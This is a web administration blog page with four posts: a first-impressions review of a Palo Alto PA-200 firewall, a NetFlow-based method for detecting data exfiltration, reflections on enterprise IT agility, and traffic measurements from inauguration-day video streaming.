Web Admin Blog Real Web Admins. Real World Experience.

2Jun/143

My First Experiences with a Palo Alto Firewall

I've been following Palo Alto as a networking company for a couple of years now.  Their claim is that the days of the port-based firewall are dead and that their application-centric approach is a far better way to enforce your access controls.  Take the HTTP protocol for example.  HTTP typically runs as a service on port 80, but does that mean that everything running on port 80 is HTTP?  As an attacker looking for a way to funnel data out of your organization, why not use the standard HTTP port to send data, since I know you leave it wide open in order for your employees to surf the web.  There's nothing to say that I actually have to be running an HTTP server on the other end and there's nothing on my classic firewall to tell any differently.  At first, I was admittedly a bit skeptical.  I didn't think that you could really tell enough about different applications on the web to be able to separate them out like Palo Alto claims to.  Fortunately, Palo Alto reached out to me and provided me with a brand new PA-200 in an attempt to change my mind.

When the PA-200 arrived, it came with everything that I would need to get it up and running.  That includes the unit itself, a power supply, a D89 to RJ45 console cable, an ethernet cable, and some instructions and warranty information.

20140521_175741

On the front of the unit is four ethernet ports for your devices, a management port, a USB port, a console port, and several status indicator LEDs.

20140521_175845-2

By default, the appliance is configured with ethernet ports 1 and 2 paired as a WAN to LAN link as this is the configuration that the majority of the people who buy it will likely use it for.  That said, by following the instructions to connect your computer up to the management port, you can quickly access the user interface that allows you to change this assignment.

Ethernet Configuration

This shows the ethernet 1 and 2 interfaces as both being a "virtual wire" and here we can see the virtual wire that connects the two.

Virtual Wire

From here, we can take a look at the "zones" and see that our two interfaces have been defined as an untrusted (ethernet 1) and trusted (ethernet 2) zone.

Zones

To think of this a different way, my cable modem WAN connection (ie. the Internet) goes in my "untrust" zone and my local network (ie. LAN) goes in my "trust" zone.  Now all that's left is to set our policy and for ease of management to start with, I set it to allow everything out with a default deny all inbound.

Security Profile

With this configuration I had done enough to be up and running on the device and I immediately started to see data populate the dashboard on the top applications running on my network.

Top Applications

It's color coded based on risk level and the dashboard also provides me a similar view of Top High Risk Applications.  Any of these boxes can be clicked on in order to provide additional data about the protocol, sources, destinations, countries, and more.

Application Information

Now, let me say that while I'm running this on my home internet connection, this thing is a hoss and can do way more than I can throw at it.  With their App-ID technology enabled you can throw 100 Mbps of throughput at it no problem.  In addition to being an application firewall, it also does standard port-based firewalling, VPN, routing, switching, and so much more.  It's so extremely versatile that this thing could easily be placed in a smaller branch office and replace multiple other devices on their network such as a firewall, router, and VPN concentrator.  More functionality for less money...who wouldn't want that?  In addition to these default capabilities, additional licensing can also be obtained to allow you to do URL filtering, malware detection, and more.  Having just gotten this up and running, I'm still exploring the ins and outs of all of the functionality, but it's pretty exciting to have all of this capability in a box that is smaller than the cable modem my ISP provides me.  More posts to come on this as I get deeper into the guts of running my new Palo Alto PA-200 !

8May/140

Analyzing NetFlow for Data Loss Detection

The 2014 Verizon Data Breach Investigation Report (DBIR) is out and it paints quite the gloomy picture of the world we live in today where cyber security is concerned.  With over 63,000 security incidents and 1,367 confirmed data breaches, the question is no longer if you get popped, but rather, when.  According to the report, data export is second only to credit card theft on the list of threat actions as a result of a breach.  And with the time to compromise typically measured in days and time to discovery measured in weeks or months, Houston, we have a problem.

I've written in the past about all of the cool tricks we've been doing to find malware and other security issues by performing NetFlow analysis using the 21CT LYNXeon tool and this time I've found another trick around data loss detection that I thought was worth writing about.  Before I get into the trick, let's quickly recap NetFlow for those who aren't familiar with it.

Think of NetFlow as the cliff notes of all of the network traffic that your systems handle on a daily basis.  Instead of seeing WHAT data was transmitted (a task for deep packet inspection/DPI), we see the summary of HOW the data was transmitted.  Things like source and destination IP, source and destination port, protocol, and bytes sent and received.  Because many network devices are capable of giving you this information for free, it only makes sense to capture it and start using it for security analytics.

So, now we have our NetFlow and we know that we're going to be breached eventually, the real question becomes how to detect it quickly and remediate before a significant data loss occurs.  Our LYNXeon tool allows us to create patterns of what to look for within NetFlow and other data sources.  So, to help detect for data loss, I've designed the following analytic:

LYNXeon Analytics for Data Loss

What this analytic does is it searches our NetFlow for any time an internal IP address is talking to an external IP address.  Then, it adds up the bytes sent for each of these unique sets of connections (same source, destination, and port) and presents me with a top 25 list.  Something like this:

Top 25 List

So, now we have a list of the top 25 source and destination pairs that are sending data outside of our organization.  There are also some interesting ports in this list like 12547, 22 (SSH), 443 (HTTPS), and 29234.  A system with 38.48 GB worth of data sent to a remote server seems like a bad sign and something that should be investigated.  You get the idea.  It's just a matter of analyzing the data and separating out what is typical vs what isn't and then digging deeper into those.

My advice is to run this report on an automated schedule at least daily so that you can quickly detect when data loss has begun in order to squash it at the source.  You could probably argue that an attacker might take a low and slow approach to remain undetected by my report, and you'd probably be right, but I'd also argue that if this were the case, then I've hopefully slowed them enough to catch them another way within a reasonable timespan.  Remember, security is all about defense in depth and with the many significant issues that are highlighted by the Verizon DBIR, we could use all of the defense we can muster.

9Feb/100

Enterprise Systems vs. Agility

I was recently reading a good Cameron Purdy post where he talks about his eight theses regarding why startups or students can pull stuff off that large enterprise IT shops can't.

My summary/trenchant restatement of his points:

  1. Changing existing systems is harder than making a custom-built new one (version 2 is harder)
  2. IT veterans overcomplicate new systems
  3. The complexity of a system increases exponentially the work needed to change it (versions 3 and 4 are way way harder)
  4. Students/startups do fail a lot, you just don't see those
  5. Risk management steps add friction
  6. Organizational overhead (paperwork/meetings) adds friction
  7. Only overconservative goons work in enterprise IT anyway
  8. The larger the org, the more conflict

Though I suspect #1 and #3 are the same, #2 and #5 are the same, and #6 and #8 are the same, really.

I've been thinking about this lately with my change from our enterprise IT Web site to a new greenfield cloud-hosted SaaS product in our R&D organization.  It's definitely a huge breath of fresh air to be able to move fast.  My observations:

Complexity

The problem of systems complexity (theses #1 and #3) is a very real one.  I used to describe our Web site as having reached "system gridlock."  There were hundreds of apps running dozens to a server with poorly documented dependencies on all kinds of stuff.  You would go in and find something that looked "wrong" - an Apache config, script, load balancer rule, whatever - but if you touched it some house of cards somewhere would come tumbling down.  Since every app developer was allowed to design their own app in its own tightly coupled way, we had to implement draconian change control and release processes in an attempt to stem the tide of people lining up to crash the Web site.

We have a new system design philosophy for our new gig which I refer to as "sharing is the devil."  All components are separated and loosely coupled.  Using cloud computing for hardware and open source for software makes it easy and affordable to have a box that does "only one thing."  In traditional compute environments there's pressure to "use up all that CPU before you add more", which results in a penny wise, pound foolish strategy of consolidation.  More and more apps and functions get crunched closer together and when you go back to pull them out you discover that all kinds of new connections and dependencies have formed unbidden.

Complication

Overcomplicating systems (#2 and #5) can be somewhat overcome by using agile principles.  We've been delving heavily into doing not just our apps but also our infrastructure according to an agile methodology.  It surfaces your requirements - frankly, systems people often get away with implementing whatever they want, without having a spec let alone one open to review.  Also, it makes you prioritize.  "Whatever you can get done in this two week iteration, that's what you'll have done, and it should be working."  It forces focus on what is required to get things to work and delays more complex niceties till later as there's time.

Conservatism

Both small and large organizations can suffer from #6 and #8.  That's mostly a mindset issue.  I like to tell the story about how we were working on a high level joint IT/business vision for our Web site.  We identified a number of "pillars" of the strategy we were developing - performance, availability, TCO, etc.  I had identified agility as one, but one of the application directors just wasn't buying into it.  "Agility, that's weird, how do we measure that, we should just forget about it."  I finally had to take all the things we had to the business head of the Web and say "of these, which would you say is the single most important one?"  "Agility, of course," he said, as I knew he would.  I made it a point to train my staff that "getting it done" was the most important thing, more important than risk mitigation or crossing all the t's and dotting all the i's.  That can be difficult if the larger organization doesn't reward risk and achievement over conservatism, but you can work on it.

21Jan/090

A DoS We Can Believe In

We knew that the historic inauguration of Barack Obama would be generating a lot more Internet traffic than usual, both in general and specifically here at NI.  Being prudent Web Admin types, we checked around to make sure we thought that there wouldn't be any untoward effects on our Web site.  Like many corporate sites, we use the same pipe for inbound Internet client usage and outbound Web traffic, so employees streaming video to watch the event could pose a problem.  We got all thumbs up after consulting with our networking team, and decided to not even send any messaging asking people to avoid streaming.  But, we monitored the situation carefully as the day unwound.  Here's what we saw, just for your edification!

Our max inbound Internet throughput was 285 Mbps, about double our usual peak.  We saw a ni.com Web site performance degradation of about 25% for less than two hours according to our Keynote stats.  ni.com ASPs were affected proportionately which indicates the slowdown was Internet-wide and not unique to our specific Internet connection here in Austin.  The slowdown was less pronounced internationally, but still visible.  So in summary - not a global holocaust, but a noticeable bump.

Cacti graphs showing our Internet connection traffic:

obamabumpcactihrlyobamabumpcactidaily

Keynote graph of several of our Web assets, showing global response time in seconds:obamabumpkeynoteLooking at the traffic specifically, there were two main standouts.  We had TCP 1935, which is Flash RTMP, peaking around 85 Mbps, and UDP 8247, which is a special CNN port (they use a plugin called "Octoshape" with their Flash streaming), peaking at 50 Mbps.   We have an overall presence of about 2500 people here at our Austin HQ on an average day, but we can't tell exactly how many were streaming.  (Our NetQoS setup shows us there were 13,600 'flows,' but every time a stream stops and starts that creates a new one - and the streams were hiccupping like crazy.  We'd have to do a bunch of Excel work to figure out max concurrent, and have better things to do.)

In terms of the streaming provider breakdown - since everyone uses Akamai now, the vast majority showed as "Akamai".  We could probably dig more to find out, but we don't really care all that much.  And, many of the sources were overwhelmed, which helped some.

We just wanted to share the data, in case anyone finds it helpful or interesting.